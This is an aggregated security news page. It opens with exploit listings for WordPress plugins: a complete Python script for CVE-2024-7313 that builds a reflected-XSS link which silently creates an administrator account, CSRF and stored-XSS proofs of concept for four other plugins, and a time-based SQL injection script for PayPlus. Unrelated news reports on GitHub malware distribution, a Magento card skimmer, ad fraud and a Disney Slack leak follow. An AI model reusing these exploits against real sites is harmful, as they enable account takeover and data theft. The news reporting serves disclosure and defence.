WordPress Shield Security plugin versions 20.0.5 and below cross site scripting exploit that adds an administrative user.

# Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation  
# Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)  
# Date: 16/08/2024  
# Exploit Author: Tim Lepp  
# Vendor Homepage: https://getshieldsecurity.com/  
# Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)  
# Version: <20.0.6  
# Tested on: Ubuntu  
# CVE : CVE-2024-7313

How It Works

  *   The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.  
  *   If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.  
  *   The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.  
  *  
The payload is then URL-encoded and displayed for use in the attack.  
  *  
Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.

Reference  
https://research.cleantalk.org/cve-2024-7313/

Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main

--- code ---

import sys  
import urllib.parse  
import requests  
from bs4 import BeautifulSoup

# Color codes for terminal output  
red = '\033[91m'  
green = '\033[92m'  
yellow = '\033[93m'  
blue = '\033[96m'  
purple = '\033[95m'  
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script  
def print_banner():  
    print(f"""{red}  
#############################################################################  
#                                                                           #  
#                                                                           #  
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #  
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #  
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #  
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #  
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #  
#                                                                           #  
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #  
#    Reflected XSS in WordPress Shield Security Plugin                      #  
#    Versions Affected: < 20.0.6                                            #  
#    Risk: High                                                             #  
#    Discovered by: Wayne-Kerr                                              #  
#    Published: August 7, 2024                                              #  
#############################################################################   
    {reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used  
def print_help():  
    print(f"""{yellow}  
Usage: python3 exploit.py <target_url>

Example:  
    python3 exploit.py http://example.com

Options:  
    -h, --help    Show this help message and exit  
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"  
def format_target_url(target_url):  
    if target_url.startswith("http://") or target_url.startswith("https://"):  
        return target_url  
    else:  
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page  
def check_vulnerability(target_url):  
    try:  
        response = requests.get(f"{target_url}/wp-login.php")  
        if response.status_code == 200:  
            # Try to extract version information from the response  
            version_info = response.text.split("ver=")[-1].split("\"")[0]  
            version = version_info.split(".")  
            major_version = int(version[0])  
            minor_version = int(version[1])  
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6  
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):  
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")  
                return True  
            else:  
                print(f"{yellow}Version not vulnerable.{reset}")  
                return False  
        else:  
            print(f"{red}Failed to retrieve the version information.{reset}")  
            return False  
    except Exception as e:  
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")  
        return False

# Generate the XSS payload URL that exploits the vulnerability  
def generate_xss_payload(target_url, username, email, first_name, last_name):  
    # Hardcoded password for the new admin account to be created  
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack  
    payload_template = (  
        "var xhrNonce = new XMLHttpRequest(); "  
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "  
        "xhrNonce.onload = function() {{ "  
        "if (xhrNonce.status === 200) {{ "  
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "  
        "var xhr = new XMLHttpRequest(); "  
        "xhr.open('POST', '/wp-admin/user-new.php', true); "  
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "  
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "  
        "xhr.setRequestHeader('Origin', '{target}'); "  
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "  
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"  
        "&user_login={username}&email={email}"  
        "&first_name={first_name}&last_name={last_name}&url=test"  
        "&pass1={password}&pass2={password}&role=administrator"  
        "&createuser=Add+New+User'; "  
        "xhr.send(params); "  
        "xhr.onload = function() {{ "  
        "if (xhr.status == 200) {{ "  
        "console.log('Admin user created successfully'); "  
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "  
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "  
        "}}; "  
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "  
        "xhrNonce.send();"  
    )

    # Formatting the payload with the provided details  
    payload = payload_template.format(  
        target=target_url,  
        username=username,  
        email=urllib.parse.quote(email),  
        first_name=first_name,  
        last_name=last_name,  
        password=urllib.parse.quote(hardcoded_password)  
    )

    # URL encode the payload and generate the full URL for the XSS attack  
    encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")  
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":  
    try:  
        # Print the banner  
        print_banner()

        # Check for help menu flag and print help if necessary  
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:  
            print_help()  
            sys.exit(0)

        # Get the target URL from the command-line argument  
        raw_target_url = sys.argv[1]  
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable  
        if not check_vulnerability(target_url):  
            sys.exit(1)

        # Get user input for the new admin account details  
        username = input(f"{blue}Enter username: {reset}")  
        email = input(f"{blue}Enter email: {reset}")  
        first_name = input(f"{blue}Enter first name: {reset}")  
        last_name = input(f"{blue}Enter last name: {reset}")

        # Display the hardcoded password  
        hardcoded_password = "HaxorStrongAFPassword123!!"  
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL  
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)  
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption  
    except KeyboardInterrupt:  
        print(f"\n{red}Script interrupted by user.{reset}")  
        sys.exit(1)  
    # Catch any other exceptions and display an error message  
    except Exception as e:  
        print(f"{red}An error occurred: {e}{reset}")  
        sys.exit(1)

WordPress Shield Security 20.0.5 Cross Site Scripting

WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/# Version: <= 0.2.1# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF check in some places, and is missingsanitisation as well as escaping, which could allow attackers to makelogged in admin add Stored XSS payloads via a CSRF attackProof of ConceptHave a logged in admin open a page containing:<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=studio_settings"method="POST">      <input type="hidden" name="studio_apikey"value=""><script>alert(1)</script>" />      <input type="hidden" name="studio_url"value=""><script>alert(1)</script>" />      <input type="hidden" name="save" value="Save!" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting

WordPress Profilepro plugin versions 1.3 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/profilepro/# Version: <= 1.3# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low as subscriberto perform Cross-Site Scripting attacksProof of ConceptRun the following code from the browser console from the subscriber user```fetch("../wp-admin/admin-ajax.php", {  method: "POST",  headers: {    "Accept": "*/*",    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",    "X-Requested-With": "XMLHttpRequest"  },  body:"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  credentials: "include"}).then(response => {  if (!response.ok) {    throw new Error('Network response was not ok');  }  return response.text();}).then(data => console.log(data)).catch(error => console.error('Error:', error));```- As an admin, go tohttp://example.com/wp-admin/edit.php?post_type=profilepro_form- Choose the default profile, click on edit and click on add field, XSSwill pop up.Reference:https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/

WordPress Profilepro 1.3 Cross Site Scripting

WordPress Light Poll plugin versions 1.0.0 and below suffer from multiple cross site request forgery vulnerabilities.

    # Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks when deleting polls, which could allowattackers to make logged in users perform such action via a CSRF attackProof of Concept<html>  <body>    <form action="http://localhost/wp-admin/admin.php">      <input type="hidden" name="page" value="lp_settings" />      <input type="hidden" name="task" value="remove" />      <input type="hidden" name="id" value="1" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html>Reference:https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/# Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF# Date: 05-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/light-poll/# Version: <=1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not have CSRF checks in some places, which could allowattackers to make logged in users perform unwanted actions via CSRF attacksProof of ConceptWhere <<POLL_ID>> and <<ANSWER_ID>> are valid:https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<<POLL_ID>>&answer_id=<<ANSWER_ID>>Reference:https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/

WordPress Light Poll 1.0.0 Cross Site Request Forgery

WordPress PVN Auth Popup plugin version 1.0.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS# Date: 08-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/# Version: <= 1.0.0# Tested on: Firefox# Contact me: vulns@vulnseeker.orgDescriptionThe plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)Proof of Concept1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup2. In the first section, enter the payload `"><script>alert(1)</script>`for the "Login text" input3. Save and see the XSSNote: Other fields are likely vulnerableReference:https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/

WordPress PVN Auth Popup 1.0.0 Cross Site Scripting

WordPress PayPlus Payment Gateway plugin versions prior to 6.6.9 suffer from a remote SQL injection vulnerability.

    #!/usr/bin/env python3.11import requestsimport timedef exploit(url):    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}    start = time.time()    with requests.Session() as session:        session.headers.update({            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        })        response = requests.get(url, params=payload)        print(f"Exploiting {url}...")        end = time.time()        print(response.status_code)        response_time = end - start        print(f"Response time: {response_time}...")if __name__ == "__main__":    url = input("Enter the vulnerable URL (e.g., https://test.site): ")    if not url.startswith("http"):        url = "http://" + url    exploit(url)

WordPress PayPlus Payment Gateway SQL Injection

A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware and netting them $100,000 in illicit profits over the past year.
The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to

A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware and netting them $100,000 in illicit profits over the past year.

The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to share malicious links or malware, per Check Point, which has dubbed it "Stargazers Ghost Network."

Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy.

The network is believed to have been active since August 2022 in some preliminary form, although an advertisement for the DaaS wasn't spotted in the dark until early July 2023.

"Threat actors now operate a network of 'Ghost' accounts that distribute malware via malicious links on their repositories and encrypted archives as releases," security researcher Antonis Terefos explained in an analysis published last week.

"This network not only distributes malware but also provides various other activities that make these 'Ghost' accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories."

Different categories of GitHub accounts are responsible for distinct aspects of the scheme in an attempt to make their infrastructure more resilient to takedown efforts by GitHub when malicious payloads are flagged on the platform.

  
These include accounts that serve the phishing repository template, accounts providing the image for the phishing template, and accounts that push malware to the repositories in the form of a password-protected archive masquerading as cracked software and game cheats.

Should the third set of accounts be detected and banned by GitHub, Stargazer Goblin moves to update the first account's phishing repository with a new link to a new active malicious release, thereby allowing the operators to move forward with minimal disruption.

Besides liking new releases from multiple repositories and committing changes to the README.md files to modify the download links, there is evidence to suggest that some accounts part of the network have been previously compromised, with the credentials likely obtained via stealer malware.

"Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected," Terefos said.

"It's common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one."

One of the campaigns discovered by Check Point involves the use of a malicious link to a GitHub repository that, in turn, points to a PHP script hosted on a WordPress site and delivers an HTML Application (HTA) file to ultimately execute Atlantida Stealer by means of a PowerShell script.

Other malware families propagated via the DaaS are Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point further noted that the GitHub accounts are part of a larger DaaS solution that operates similar ghost accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.

"Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when GitHub disrupts their network," Terefos said.

"Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts."

The development comes as unknown threat actors are targeting GitHub repositories, wiping their contents, and asking the victims to reach out to a user named Gitloker on Telegram as part of a new extortion operation that has been ongoing since February 2024.

The social engineering attack targets developers with phishing emails sent from "notifications@github.com," aiming to trick them into clicking on bogus links under the guise of a job opportunity at GitHub, following which they are prompted to authorize a new OAuth app that erases all the repositories and demands a payment in exchange for restoring access.

It also follows an advisory from Truffle Security that it's possible to access sensitive data from deleted forks, deleted repositories, and even private repositories on GitHub, urging organizations to take steps to secure against what it's calling a Cross Fork Object Reference (CFOR) vulnerability.

"A CFOR vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks)," Joe Leon said. "Similar to an Insecure Direct Object Reference, in CFOR users supply commit hashes to directly access commit data that otherwise would not be visible to them."

In other words, a piece of code committed to a public repository may be accessible forever as long as there exists at least one fork of that repository. On top of that, it could also be used to access code committed between the time an internal fork is created and the repository is made public.

It's however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation -

*   Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository
*   When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone.

"The average user views the separation of private and public repositories as a security boundary, and understandably believes that any data located in a private repository cannot be accessed by public users," Leon said.

"Unfortunately, \[...\] that is not always true. What's more, the act of deletion implies the destruction of data. As we saw above, deleting a repository or fork does not mean your commit data is actually deleted."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

'Stargazer Goblin' Creates 3,000 Fake GitHub Accounts for Malware Spread

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data into the credit card form on the

Threat Detection / Website Security

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.

The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.

The skimmer is designed to capture all the data into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named "amazon-analytic\[.\]com," which was registered in February 2024.

"Note the use of the brand name; this tactic of leveraging popular products and services in domain names is often used by bad actors in an attempt to evade detection," security researcher Matt Morrow said.

This is just one of many defense evasion methods employed by the threat actor, which also includes the use of swap files ("bootstrap.php-swapme") to load the malicious code while keeping the original file ("bootstrap.php") intact and free of malware.

"When files are edited directly via ssh the server will create a temporary 'swap' version in case the editor crashes, which prevents the entire contents from being lost," Morrow explained.

"It became evident that the attackers were leveraging a swap file to keep the malware present on the server and evade normal methods of detection."

Although it's currently not clear how the initial access was obtained in this case, it's suspected to have involved the use of SSH or some other terminal session.

The disclosure arrives as compromised administrator user accounts on WordPress sites are being used to install a malicious plugin that masquerades as the legitimate Wordfence plugin, but comes with capabilities to create rogue admin users and disable Wordfence while giving a false impression that everything is working as expected.

"In order for the malicious plugin to have been placed on the website in the first place, the website would have already had to have been compromised — but this malware could definitely serve as a reinfection vector," security researcher Ben Martin said.

"The malicious code only works on pages of WordPress admin interface whose URL contains the word 'Wordfence' in them (Wordfence plugin configuration pages)."

Site owners are advised to restrict the use of common protocols like FTP, sFTP, and SSH to trusted IP addresses, as well as ensure that the content management systems and plugins are up-to-date.

Users are also recommended to enable two-factor authentication (2FA), use a firewall to block bots, and enforce additional wp-config.php security implementations such as DISALLOW\_FILE\_EDIT and DISALLOW\_FILE\_MODS.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files

Details have emerged about a "massive ad fraud operation" that leverages hundreds of apps on the Google Play Store to perform a host of nefarious activities.
The campaign has been codenamed Konfety – the Russian word for Candy – owing to its abuse of a mobile advertising software development kit (SDK) associated with a Russia-based ad network called CaramelAds.
"Konfety represents a new form of

Mobile Security / Online Security

Details have emerged about a "massive ad fraud operation" that leverages hundreds of apps on the Google Play Store to perform a host of nefarious activities.

The campaign has been codenamed **Konfety** – the Russian word for Candy – owing to its abuse of a mobile advertising software development kit (SDK) associated with a Russia-based ad network called CaramelAds.

"Konfety represents a new form of fraud and obfuscation, in which threat actors operate 'evil twin' versions of 'decoy twin' apps available on major marketplaces," HUMAN's Satori Threat Intelligence Team said in a technical report shared with The Hacker News.

While the decoy apps, totaling more than 250 in number, are harmless and distributed via the Google Play Store, their respective "evil twins" are disseminated through a malvertising campaign designed to facilitate ad fraud, monitor web searches, install browser extensions, and sideload APK files code onto users' devices.

The most unusual aspect of the campaign is that the evil twin masquerades as the decoy twin by spoofing the latter's app ID and advertising publisher IDs for rendering ads. Both the decoy and evil twin sets of apps operate on the same infrastructure, allowing the threat actors to exponentially scale their operations as required.

That having said, not only do the decoy apps behave normally, a majority of them do not even render ads. They also incorporate a GDPR consent notice.

"This 'decoy/evil twin' mechanism for obfuscation is a novel way for threat actors to represent fraudulent traffic as legitimate," HUMAN researchers said. "At its peak, Konfety-related programmatic volume reached 10 billion requests per day."

Put differently, Konfety takes advantage of the SDK's ad rendering capabilities to commit ad fraud by making it a lot more challenging to distinguish malicious traffic from legitimate traffic.

The Konfety evil twin apps are said to be propagated via a malvertising campaign promoting APK mods and other software like Letasoft Sound Booster, with the booby-trapped URLs hosted on attacker-controlled domains, compromised WordPress sites, and other platforms that allow content uploads, including Docker Hub, Facebook, Google Sites, and OpenSea.

Users who end up clicking on these URLs are redirected to a domain that tricks them into downloading the malicious evil twin app, which, in turn, acts as a dropper for a first-stage that's decrypted from the assets of the APK file and is used to set up command-and-control (C2) communications.

The initial stager further attempts to hide the app's icon from the device's home screen and runs a second-stage DEX payload that performs fraud by serving out-of-context, full-screen video ads when the user is either on their home screen or using another app.

"The crux of the Konfety operation lies in the evil twin apps," the researchers said. "These apps mimic their corresponding decoy twin apps by copying their app ID/package names and publisher IDs from the decoy twin apps."

"The network traffic derived from the evil twin applications is functionally identical to network traffic derived from the decoy twin applications; the ad impressions rendered by the evil twins use the package name of the decoy twins in the request."

Other capabilities of the malware include weaponizing the CaramelAds SDK to visit websites using the default web browser, luring users by sending notifications that prompt them into clicking on the bogus links, or sideloading modified versions of other advertising SDKs.

That's not all. Users installing the Evil Twins apps are urged to add a search toolbar widget to the device home screen, which surreptitiously monitors their searches by sending the data to domains named vptrackme\[.\]com and youaresearching\[.\]com.

"Threat actors understand that hosting malicious apps on stores is not a stable technique, and are finding creative and clever ways to evade detection and commit sustainable long term fraud," the researchers concluded. "Actors setting up mediation SDK companies and spreading the SDK to abuse high-quality publishers is a growing technique."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

'Konfety' Ad Fraud Uses 250+ Google Play Decoy Apps to Hide Malicious Twins

Hacktivists claim they have stolen 1.2 TB of data from Disney's developer Slack channels.

A group of cybercriminals going by the handle NullBulge claims to have downloaded the Slack channels used by Disney’s developers.

> “#DisneySlackLeak
> 
> #Disney has had their entire dev slack dumped. 1.1TiB of files and chat messages. Anything we could get our hands on, we downloaded and packaged up. Want to see what goes on behind the doors? go grab it.”

The group says it got a hold of a huge amount of data, including unreleased projects and login info:

> “1.2 TB of data, almost10,000 channels, every message and file possible, dumped. Unreleased projects, raw images and code, some logins, links to internal api/web pages, and more! Have fun sifting through it, there is a lot there. We tried to hold off until we got deeper in, but our inside man got cold feet and kicked us out! I thought we had something special {name}! Consider the dropping of literally every bit of personal info you have, from logins to credit cards to SSN, as a warning for people in the future.”

This seems to indicate that the group was helped by an insider, and that it might have obtained even more had that person not backed out of assisting. It’s unlikely that NullBulge had access to customer data through these Slack channels, but it does look as if the group accessed a lot of material that Disney was working on.

Calling itself a hacktivist group that aims for better compensation and protection of artists’ rights, the group then announced the breach on infamous data leak site BreachForums and provided screenshots of its findings.

Post by NullBulge on BreachForums

> “Hi there folks, it is us again.
> 
> Yesterday we leaked some small DB, now we leak the big guns.
> 
> 1.1TiB of data. almost 10,000 channels, every message and file possible, dumped. Unreleased projects, raw images and code, some logins, links to internal api/web pages, and more! Have fun sifting through it, there is a lot there.
> 
> Perfect for gathering intelligence and more.”

The earlier post NullBulge is referring to is a WordPress database dump of the howwelove\[.\]com domain. We have no idea what the group’s beef with this relationships-focused website is.

Disney is yet to make a comment. We’ll keep this post updated with the latest developments

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

**Summer mega sale**

Go into your vacation knowing you’re much more secure: This summer you can get a huge **50% off a Malwarebytes Standard subscription** or **Malwarebytes Identity bundle**. Run, don’t walk!

Tag

#wordpress